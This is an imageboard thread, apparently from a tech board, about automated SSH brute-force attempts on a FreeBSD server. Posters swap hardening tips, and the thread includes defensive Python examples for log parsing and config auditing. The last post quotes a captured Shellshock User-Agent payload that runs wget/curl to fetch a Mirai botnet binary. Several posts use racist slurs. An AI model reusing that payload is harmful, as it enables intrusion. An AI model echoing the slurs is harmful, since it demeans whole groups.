Long live the FreeBSD handbook!

>tfw some Chinese bots have been trying to hijack my FreeBSD system all day, but failed to authenticate despite numerous attempts.

Luckily I disabled password authentication over SSH and only use pubkeys.

Sup Forums is not your personal blog.

This is not a blog post. Not everybody knows not to enable PAM.

God knows what could have happened, so this is just a friendly reminder to beware mean people.

Why don't you share with the rest of the class then instead of making this low content thread?

>not really FreeBSD related
curious, how long was the server exposed till first attempts?

Only about an hour. It probably scanned for my ip because I didn’t give it to anyone before this started

How do they know your ip though

They blast the internet with scripts. I had the exact same thing happen immediately after setting up an Ubuntu server. It really is unsettling to see this from a noob's perspective.

the IPv4 space is relatively small, the chink government can scan the whole internet for open ports quickly because they have plenty of machines available

Install fail2ban pleb

>not using tarpitting

Use fail2ban, ssh with keys and a firewall.

Just drop all Chinese packets

definitely this

and the ones from eastern europe or even any country besides your own. you have nothing to lose from doing that.

>Chinese bots
I'm just running a tor node. Problem solved.

t. angry chinaman

but we recommend that he blocks china

I'm a noob and this is unsettling to me.

>Luckily I disabled password authentication over SSH and only use pubkeys.
yeah, so lucky otherwise they definitely would have guessed it, am I rite?

protip: there are systems with password auth enabled sitting open to the internet every day that have statistically insignificant levels of risk due to following proper password standards

stupid question but where are the ranges listed in a ready to use format?

wizcrafts.net/chinese-iptables-blocklist.html
Not sure how up to date this is anymore, I've had it bookmarked for ages.

Thanks. I'm lazy to look but I'm sure there are sources out there that have compiled ready to use lists for popular confs

this happens to every single server the second it starts. passphrase is absolutely necessary as soon as possible.

>Intel CPU
>browsing internet
>drive-by js steals ssh key
>ah-so me so solly

Too dumb to install fail2ban?

Is ssh on port 22 or something different?

I run some things from my home network and I get random ruskis and chinks slamming anything I have open every so often. Just happens, welcome to network administration

Well I just checked the log... I guess it's time to install fail2ban
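Added example, not part of any post in the thread and not fail2ban's own code: a sketch of the counting that tools like fail2ban apply to the SSH log, flagging an address once it has `maxretry` failures inside a `findtime` window. The log lines are constructed samples in the usual OpenSSH syslog shape with documentation-range IPs; the regex and the `offenders` function are assumptions of this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample lines (not taken from the thread).
SAMPLE_LOG = """\
Jan 10 03:12:01 host sshd[811]: Invalid user admin from 203.0.113.5 port 40112
Jan 10 03:12:03 host sshd[811]: Failed password for invalid user admin from 203.0.113.5 port 40112 ssh2
Jan 10 03:12:09 host sshd[815]: Failed password for root from 203.0.113.5 port 40120 ssh2
Jan 10 03:12:30 host sshd[820]: Connection closed by authenticating user root 203.0.113.5 port 40131 [preauth]
Jan 10 03:40:00 host sshd[900]: Failed password for root from 198.51.100.7 port 5022 ssh2
Jan 10 09:15:00 host sshd[990]: Accepted publickey for alice from 192.0.2.44 port 50000 ssh2
Jan 10 11:00:00 host sshd[999]: Failed password for root from 198.51.100.7 port 5023 ssh2
"""

# One hit per failed attempt: either a rejected credential, or a client that
# gave up before authenticating (what key-only servers typically log).
# "Invalid user ..." lines are skipped so one attempt is not counted twice.
FAIL_RE = re.compile(
    r"sshd\[\d+\]: (?:Failed \S+ for (?:invalid user )?\S+ from "
    r"|Connection closed by (?:authenticating|invalid) user \S+ )"
    r"(\d{1,3}(?:\.\d{1,3}){3}) port"
)

def offenders(log_text, maxretry=3, findtime=600, year=2024):
    """Return IPs with >= maxretry failures within findtime seconds, in order seen."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    flagged = []
    for line in log_text.splitlines():
        m = FAIL_RE.search(line)
        if not m:
            continue
        # Classic syslog stamps carry no year, so one is supplied explicitly.
        when = datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
        window = recent[m.group(1)]
        window.append(when)
        while (when - window[0]).total_seconds() > findtime:
            window.popleft()      # drop failures older than the window
        if len(window) >= maxretry and m.group(1) not in flagged:
            flagged.append(m.group(1))
    return flagged

if __name__ == "__main__":
    print(offenders(SAMPLE_LOG))
```
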

that's just automated bots trying default and leaked shit. even password login is enough as long as you use a good password. also someone who really cares would only whitelist their own ip or isp ip ranges if dynamic ip for ssh access in their firewall instead of letting everyone access it for no reason.

dumb me forgot pic

Just change the ssh port, that is all the security you need.

disable root login. create user in the sudoers group. simple as that. fail2ban is bloat.

Why not simply ban all of China and Russia ip ranges?

people.netfilter.org/peejix/geoip/howto/geoip-HOWTO-3.html

This. Had a server with ssh port 22 open to the public, I had between 20-30 IPs blocked each day for authentication failed on ssh p22 password. The password was a 40 char long P/W which was very easy to remember and had access anywhere. Nothing broke in, only attempts

because it's easier to just whitelist your own ip addresses

What if I'm abroad and nginx crashes?

VPN

first of all you should not even have passwords for ssh, you should permit authorized rsa keys only, and definitely not allow root login
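Added example, not part of any post in the thread: a small audit of `sshd_config` text for the settings posters keep recommending (keys only, no root login, no password prompt left open through keyboard-interactive/PAM). It follows sshd's rule that the first value seen for a keyword wins; the defaults table reflects upstream OpenSSH and is an assumption, since vendor builds can differ, and the sample config is constructed.

```python
# Upstream OpenSSH defaults (assumption: your vendor build may ship others;
# `sshd -T` prints the configuration the running binary would actually use).
UPSTREAM_DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",   # the PAM password prompt path
    "permitrootlogin": "prohibit-password",
    "pubkeyauthentication": "yes",
}
# Older configs use the deprecated name for keyboard-interactive auth.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}
WANTED = {
    "passwordauthentication": {"no"},
    "kbdinteractiveauthentication": {"no"},
    "permitrootlogin": {"no"},
    "pubkeyauthentication": {"yes"},
}

# Constructed sample, not a config from the thread.
SAMPLE = """\
Port 22
PermitRootLogin no
passwordauthentication no
PasswordAuthentication yes   # ignored: an earlier line already set it
#KbdInteractiveAuthentication no
Match Address 192.0.2.0/24
    PasswordAuthentication yes
"""

def effective_settings(config_text):
    """Global values for the audited keywords; keywords are case-insensitive."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":        # conditional blocks follow; globals end here
            break
        key = ALIASES.get(key, key)
        value = parts[1].strip().strip('"').lower() if len(parts) > 1 else ""
        seen.setdefault(key, value)   # first occurrence wins, as in sshd
    return {k: seen.get(k, default) for k, default in UPSTREAM_DEFAULTS.items()}

def audit(config_text):
    """Return 'keyword=value' findings that differ from the hardened values."""
    eff = effective_settings(config_text)
    return sorted(f"{k}={v}" for k, v in eff.items() if v not in WANTED[k])

if __name__ == "__main__":
    print(audit(SAMPLE))
```

The sample passes on `PasswordAuthentication` yet is still flagged, because the commented-out keyboard-interactive line leaves the default in force. `Match` blocks are not evaluated here and can re-enable passwords for some clients, so they need a separate look.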

>he doesn't block china, india, and the entire middle east on his firewall
What are you even doing?

>Want to host VPN to access home storage everywhere.
>Scared of hacking attempts.
What do?

Why did we even give internet to subhumans? I don't get it. Now they want to give internet to Africa for free.

this is a better thread than ">THE ABSOLUTE STATE OF INTEL"

Use pfSense. It has nice autoconfig wizards for generating a secure OpenVPN config, and pfSense itself will prevent your VPN from being brute forced.

Deny all, then whitelist by country.

Yeah, let's go back to talking about how Linus Tech Tips invented the GNU/Interjection free operating system that stops Jewtel CPUs from mining your AMD bitcoins while you realize that Bill Jobs is /ourguy/ even though he makes the Chrome botnet that George Soros fights with the Quantum web extensions.

This is one of my favorite internet pastimes. I welcome it because it's free exploits and malware to analyze. And some people think shellshock still works like this guy

u'user-agent': u"() { :; }; /bin/sh -c 'wget redacted/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 redacted/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl redacted/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget redacted/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null redacted/wp-admin?infect-cctv=mirai-botnet.bin'"}